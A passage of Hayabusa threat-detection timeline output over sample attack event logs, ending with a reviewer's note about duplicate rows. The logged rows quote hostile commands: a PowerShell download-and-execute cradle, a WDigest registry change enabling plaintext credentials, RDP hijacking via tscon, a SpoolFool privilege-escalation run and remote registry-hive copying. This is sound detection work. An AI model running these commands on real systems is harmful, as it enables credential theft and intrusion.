'SamAccountName'.,,rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx" +2022-01-24 17:03:25.004 +00:00,fs03vuln.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-2721507831-1374043488-2540227515-1008 | Group: Administrators | LID: 0x14f509e2,rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx" +2022-01-24 17:03:25.012 +00:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: regedit /s .sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko.reg | Path: C:\Windows\regedit.exe | PID: 0x101c | User: admmig | LID: 0x14f509e2,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx" +2022-01-24 17:03:25.012 +00:00,fs03vuln.offsec.lan,4688,medium,Evas,Imports 
Registry Key From a File,,rules/sigma/process_creation_builtin/proc_creation_win_regedit_import_keys.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx" +2022-01-24 20:11:11.361 +00:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,"""IEX(New-Object Net.WebClient).downloadString('https://miro.medium.com/max/1400/1*FnPDYeZVrGTbuE7Lj7JhgQ.png')""",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx +2022-01-24 20:11:11.361 +00:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx +2022-01-24 20:11:11.361 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""IEX(New-Object Net.WebClient).downloadString('https://miro.medium.com/max/1400/1*FnPDYeZVrGTbuE7Lj7JhgQ.png')""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx +2022-01-24 20:11:11.361 +00:00,fs03vuln.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx +2022-01-24 20:11:11.361 +00:00,fs03vuln.offsec.lan,4104,high,Exec,Suspicious PowerShell Invocations - 
Specific,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx +2022-01-26 09:20:49.101 +00:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1112,technique_name=Modify Registry | Cmd: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 | Process: C:\Windows\System32\reg.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1586d8b2 | PID: 1524 | PGUID: A57649D1-1271-61F1-315A-8E1500000000 | Hash: SHA1=0873F40DE395DE017495ED5C7E693AFB55E9F867,MD5=A3F446F1E2B8C6ECE56F608FB32B8DC6,SHA256=849F54DC526EA18D59ABAF4904CB11BC15B982D2952B971F2E1B6FBF8C974B39,IMPHASH=A069A88BBB8016324D7EC0A0EEC459EB",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx +2022-01-26 09:20:49.101 +00:00,fs03vuln.offsec.lan,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | CreateKey: HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest | Process: C:\Windows\system32\reg.exe | PID: 1524 | PGUID: A57649D1-1271-61F1-315A-8E1500000000",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx +2022-01-26 09:20:52.811 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | SetValue: HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential: DWORD (0x00000001) | Process: C:\Windows\system32\reg.exe | PID: 1524 | PGUID: 
A57649D1-1271-61F1-315A-8E1500000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx +2022-01-26 09:20:52.811 +00:00,fs03vuln.offsec.lan,13,high,Evas,Wdigest Enable UseLogonCredential,,rules/sigma/registry_sysmon/registry_set/registry_set_wdigest_enable_uselogoncredential.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx +2022-02-08 20:33:10.918 +00:00,wef.windomain.local,4697,info,Persis,Service Installed,Name: rdphijack2 | Path: cmd.exe /k tscon 2 /dest rdp-tcp#14 | User: user | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x1945c67,rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx +2022-02-08 20:33:15.159 +00:00,wef.windomain.local,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /k tscon 2 /dest rdp-tcp#14 | Path: C:\Windows\System32\cmd.exe | PID: 0x1980 | User: WEF$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx +2022-02-08 20:33:15.159 +00:00,wef.windomain.local,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: cmd.exe /k tscon 2 /dest rdp-tcp#14 | Path: C:\Windows\System32\cmd.exe | PID: 0x1980 | User: WEF$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx +2022-02-08 20:33:15.166 +00:00,wef.windomain.local,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: tscon 2 /dest rdp-tcp#14 | Path: C:\Windows\System32\tscon.exe | PID: 0x1b8c | User: WEF$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx +2022-02-16 10:37:07.251 +00:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: jbrown,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 10:37:19.637 +00:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: 02694W-WIN10$ | Computer: - | IP Addr: 172.16.66.25 | LID: 0x567343,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 10:37:20.450 +00:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: samir | Computer: 02694W-WIN10 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 10:37:20.450 +00:00,01566s-win16-ir.threebeesco.com,4672,info,,Admin Logon,User: samir | LID: 0x567515,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 10:37:20.450 +00:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: samir | Computer: 02694W-WIN10 | IP Addr: 172.16.66.25 | LID: 0x567515,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 10:37:20.520 +00:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: samir | Computer: 02694W-WIN10 | 
Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 10:37:20.521 +00:00,01566s-win16-ir.threebeesco.com,4672,info,,Admin Logon,User: samir | LID: 0x567758,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 10:37:20.534 +00:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSAM | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 10:37:20.534 +00:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSAM | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 10:37:20.534 +00:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 10:37:20.550 +00:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSYSTEM | IP Addr: 172.16.66.36 | LID: 
0x567758,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 10:37:20.550 +00:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSYSTEM | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 10:37:20.550 +00:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 10:37:20.934 +00:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSECURITY | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 10:37:20.934 +00:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSECURITY | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-16 10:37:20.934 +00:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,SMB Create Remote File Admin 
Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx +2022-02-19 17:35:16.207 +00:00,DESKTOP-TTEQ6PR,1,info,,Process Created,"Cmd: ""C:\Users\win10\Desktop\SpoolFool-main\SpoolFool.exe"" -dll C:\ProgramData\Test.dll | Process: C:\Users\win10\Desktop\SpoolFool-main\SpoolFool.exe | User: DESKTOP-TTEQ6PR\win10 | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -noexit -command Set-Location -literalPath 'C:\Users\win10\Desktop\SpoolFool-main' | LID: 0x277ef | PID: 1232 | PGUID: 08DA6306-2A54-6211-0B01-000000001000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx +2022-02-19 17:35:16.207 +00:00,DESKTOP-TTEQ6PR,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx +2022-02-19 17:35:16.301 +00:00,DESKTOP-TTEQ6PR,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\4\Test.dll | Process: C:\Users\win10\Desktop\SpoolFool-main\SpoolFool.exe | PID: 1232 | PGUID: 08DA6306-2A54-6211-0B01-000000001000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx +2022-02-19 17:35:16.328 +00:00,DESKTOP-TTEQ6PR,7,info,Persis | Evas | PrivEsc,Windows Spooler Service Suspicious Binary Load,,rules/sigma/image_load/image_load_spoolsv_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx
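Review bot: the sample timeline rows for the remote_sam_registry_access_via_backup_operator_priv.evtx source contain exact duplicate lines: the 5145 "Network Share File Access" row for `Path: Users\PSAM` at `2022-02-16 10:37:20.534` appears twice with identical details and LID `0x567758`, and the same happens for `Users\PSYSTEM` at `10:37:20.550` and `Users\PSECURITY` at `10:37:20.934`. Before shipping this as the README's reference output, confirm whether the source evtx really holds two 5145 records per path (distinct record IDs would settle it) or whether `5145_NetworkShareFileAccess.yml` is matching the same event twice; if the repetition is genuine, either keep a single pair per path in the sample or add one sentence saying that repeated 5145 rows are expected, so readers do not read the sample as a deduplication bug. Note also that the Hayabusa LOLBIN row for `regedit /s ...` at `2022-01-24 17:03:25.012` has an empty MITRE tactic column while the Sigma counterpart on the next row carries `Evas`; since the new "MITRE ATT&CK戦術の省略" section documents these abbreviations, the sample would be more instructive if the Hayabusa rule for 4688 LOLBIN abuse were tagged as well.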